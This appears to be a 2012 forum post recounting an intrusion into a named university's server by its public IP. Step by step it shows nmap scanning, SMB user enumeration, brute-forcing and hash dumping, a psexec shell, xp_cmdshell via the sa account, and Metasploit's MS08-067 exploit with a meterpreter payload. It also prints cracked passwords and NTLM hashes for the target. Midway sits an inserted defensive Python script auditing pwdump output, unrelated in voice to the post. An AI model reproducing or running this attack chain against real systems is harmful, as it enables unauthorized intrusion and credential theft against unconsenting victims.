nmap+msf intrusion of Guangxi Normal University

Posted on 2012-12-4 12:46:42
Guangxi Normal website: http://202.103.242.241/

root@bt:~# nmap -sS -sV 202.103.242.241

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 21:54 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00048s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE       VERSION
135/tcp  open  mstask        Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds  Microsoft Windows 2000 microsoft-ds
1025/tcp open  mstask        Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)
1026/tcp open  msrpc         Microsoft Windows RPC
3372/tcp open  msdtc?
3389/tcp open  ms-term-serv?
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
SF-Port3372-TCP:V=5.59BETA1%I=7%D=2/28%Time=4F4CDC90%P=i686-pc-linux-gnu%r
SF:(GetRequest,6,"hO\n\x000Z")%r(RTSPRequest,6,"hO\n\x000Z")%r(HTTPOptions
SF:,6,"hO\n\x000Z")%r(Help,6,"hO\n\x000Z")%r(SSLSessionReq,6,"hO\n\x000Z")
SF:%r(FourOhFourRequest,6,"hO\n\x000Z")%r(LPDString,6,"hO\n\x000Z")%r(SIPO
SF:ptions,6,"hO\n\x000Z");
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
Service Info: OS: Windows

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 79.12 seconds

root@bt:/usr/local/share/nmap/scripts# ls -la | grep smb    // list the scan scripts
-rw-r--r-- 1 root root 44055 2011-07-09 07:36 smb-brute.nse
-rw-r--r-- 1 root root 27691 2011-07-09 07:36 smb-check-vulns.nse
-rw-r--r-- 1 root root  4806 2011-07-09 07:36 smb-enum-domains.nse
-rw-r--r-- 1 root root  3475 2011-07-09 07:36 smb-enum-groups.nse
-rw-r--r-- 1 root root  7958 2011-07-09 07:36 smb-enum-processes.nse
-rw-r--r-- 1 root root 12221 2011-07-09 07:36 smb-enum-sessions.nse
-rw-r--r-- 1 root root  6014 2011-07-09 07:36 smb-enum-shares.nse
-rw-r--r-- 1 root root 12216 2011-07-09 07:36 smb-enum-users.nse
-rw-r--r-- 1 root root  1658 2011-07-09 07:36 smb-flood.nse
-rw-r--r-- 1 root root  2906 2011-07-09 07:36 smb-os-discovery.nse
-rw-r--r-- 1 root root 61005 2011-07-09 07:36 smb-psexec.nse
-rw-r--r-- 1 root root  4362 2011-07-09 07:36 smb-security-mode.nse
-rw-r--r-- 1 root root  2311 2011-07-09 07:36 smb-server-stats.nse
-rw-r--r-- 1 root root 13719 2011-07-09 07:36 smb-system-info.nse
-rw-r--r-- 1 root root  1429 2011-07-09 07:36 smbv2-enabled.nse

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-enum-users.nse 202.103.242.241
// use the script to enumerate the account names that exist on the remote machine

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:12 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00038s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-enum-users:
|_  Domain: PG-F289F9A8EF3E; Users: Administrator, Guest, test, TsInternetUser    // scan result

Nmap done: 1 IP address (1 host up) scanned in 1.09 seconds

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-enum-shares.nse 202.103.242.241
// view shares

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:15 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00035s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-enum-shares:
|   ADMIN$
|     Anonymous access: <none>
|   C$
|     Anonymous access: <none>
|   IPC$
|_    Anonymous access: READ

Nmap done: 1 IP address (1 host up) scanned in 1.05 seconds

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-brute.nse 202.103.242.241
// obtain user passwords

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:17 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00041s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-brute:
|   administrator:<blank> => Login was successful
|_  test:123456 => Login was successful

Nmap done: 1 IP address (1 host up) scanned in 28.22 seconds

root@bt:~# wget http://swamp.foofus.net/fizzgig/ ... -exe-only.tar.bz2    // grab the hashes
root@bt:~# tar -jxvf pwdump6-1.7.2-exe-only.tar.bz2 -C /usr/local/share/nmap/nselib/data
root@bt:/usr/local/share/nmap/scripts# wget https://svn.nmap.org/nmap-exp/dev/nmap/scripts/smb-pwdump.nse
root@bt:~# nmap --script=smb-pwdump.nse --script-args=smbuser=test,smbpass=123456 202.103.242.241 -p 135,445,139

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:25 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.0012s latency).
PORT    STATE SERVICE
135/tcp open  msrpc
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-pwdump:
| Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************
| Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************
| test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
|_TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2

Nmap done: 1 IP address (1 host up) scanned in 1.85 seconds
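The smb-pwdump output above is in pwdump format (user:RID => LM hash:NT hash). As an added example that is not part of the original post, the Python below audits such a dump from the defender's side: it flags accounts whose password is empty, accounts that still have an LM hash stored at all (meaning the NoLMHash policy is not set), and LM hashes whose second half is the well-known empty-block value AAD3B435B51404EE, which tells you the password is seven characters or shorter. The sample input is the four lines the post shows; the NO PASSWORD marker is the one pwdump6 prints for an empty field, and the remediation wording in the messages is the example's own.

```python
import re

# Constructed sample: the four hash lines the post's smb-pwdump run returned
# (format: user:RID => LM hash:NT hash).
SAMPLE_PWDUMP = """\
| smb-pwdump:
| Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************
| Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************
| test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
|_TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2
"""

# pwdump6 prints this marker instead of a hash when the field is empty.
NO_PASSWORD = "NO PASSWORD*********************"
# LM hashes the password as two independent 7-byte halves; this is the hash of an
# empty half, so an LM hash ending in it belongs to a password of 7 characters or fewer.
EMPTY_LM_HALF = "AAD3B435B51404EE"

LINE_RE = re.compile(
    r"^\|_?\s*(?P<user>[^:]+):(?P<rid>\d+)\s*=>\s*(?P<lm>[^:]+):(?P<nt>[^:]+?)\s*$"
)


def parse_pwdump(text):
    """Return one dict per hash line; the script header and other lines are skipped."""
    accounts = []
    for raw in text.splitlines():
        m = LINE_RE.match(raw.strip())
        if m:
            accounts.append({
                "user": m["user"].strip(),
                "rid": int(m["rid"]),
                "lm": m["lm"].strip().upper(),
                "nt": m["nt"].strip().upper(),
            })
    return accounts


def audit_account(acct):
    """List the credential-storage issues for one account."""
    issues = []
    lm, nt = acct["lm"], acct["nt"]
    if lm == NO_PASSWORD and nt == NO_PASSWORD:
        if acct["rid"] == 500:
            issues.append("empty password (built-in Administrator, RID 500)")
        else:
            issues.append("empty password")
        return issues
    if lm != NO_PASSWORD:
        # Any stored LM hash is a finding: set NoLMHash, then change the password
        # so the old LM hash is dropped from the SAM.
        issues.append("LM hash stored (set NoLMHash, then rotate the password)")
        if lm.endswith(EMPTY_LM_HALF):
            issues.append("password is 7 characters or shorter")
    return issues


def audit(text):
    """Map each account name in a pwdump-format dump to its list of issues."""
    return {a["user"]: audit_account(a) for a in parse_pwdump(text)}


if __name__ == "__main__":
    for user, issues in audit(SAMPLE_PWDUMP).items():
        print(f"{user}: {'; '.join(issues) or 'no issue found'}")
```

On the post's dump every account trips at least one check: two empty passwords, one LM hash that is also a short password (the test account), and one LM hash for a longer password (TsInternetUser); the first fix on a host like this is the NoLMHash policy plus a forced password change.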
C:\Documents and Settings\Administrator\桌面>psexec.exe \\202.103.242.241 -u test -p 123456 -e cmd.exe    // get a cmd shell

PsExec v1.55 - Execute processes remotely
Copyright (C) 2001-2004 Mark Russinovich
Sysinternals - www.sysinternals.com

Microsoft Windows 2000 [Version 5.00.2195]
(C) 版权所有 1985-2000 Microsoft Corp.

C:\WINNT\system32>ipconfig

Windows 2000 IP Configuration

Ethernet adapter 本地连接:

Connection-specific DNS Suffix  . :
IP Address. . . . . . . . . . . . : 202.103.242.241
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 202.103.1.1

C:\Documents and Settings\Administrator\桌面\osql>osql.exe -S 202.103.242.241 -U sa -P "123456" -Q "exec master..xp_cmdshell 'net user' "    // log in remotely as sa and run a command

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-check-vulns.nse 202.103.242.241    // check the target machine for vulnerabilities

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:41 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00046s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-check-vulns:
|_  MS08-067: VULNERABLE

Nmap done: 1 IP address (1 host up) scanned in 1.43 seconds
root@bt:~# msfconsole    // exploit the ms08-067 vulnerability against the target machine from msf

msf > search ms08
msf > use exploit/windows/smb/ms08_067_netapi
msf  exploit(ms08_067_netapi) > show options
msf  exploit(ms08_067_netapi) > set RHOST 202.103.242.241
msf  exploit(ms08_067_netapi) > show payloads
msf  exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
msf  exploit(ms08_067_netapi) > exploit

meterpreter >
Background session 2? [y/N]  (ctrl+z)
msf  exploit(ms08_067_netapi) > sessions -l

root@bt:/usr/local/share/nmap/scripts# vim usernames.txt
test
administrator

root@bt:/usr/local/share/nmap/scripts# vim password.txt
44EFCE164AB921CAAAD3B435B51404EE

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-brute.nse --script-args=userdb=usernames.txt,passdb=password.txt 192.168.1.1-254
// try to log in across the whole internal range with the usernames and the captured hash

Nmap scan report for 192.168.1.105
Host is up (0.00088s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-brute:
|_  administrator:<blank> => Login was successful

Attack successful, a simple msf+nmap attack~~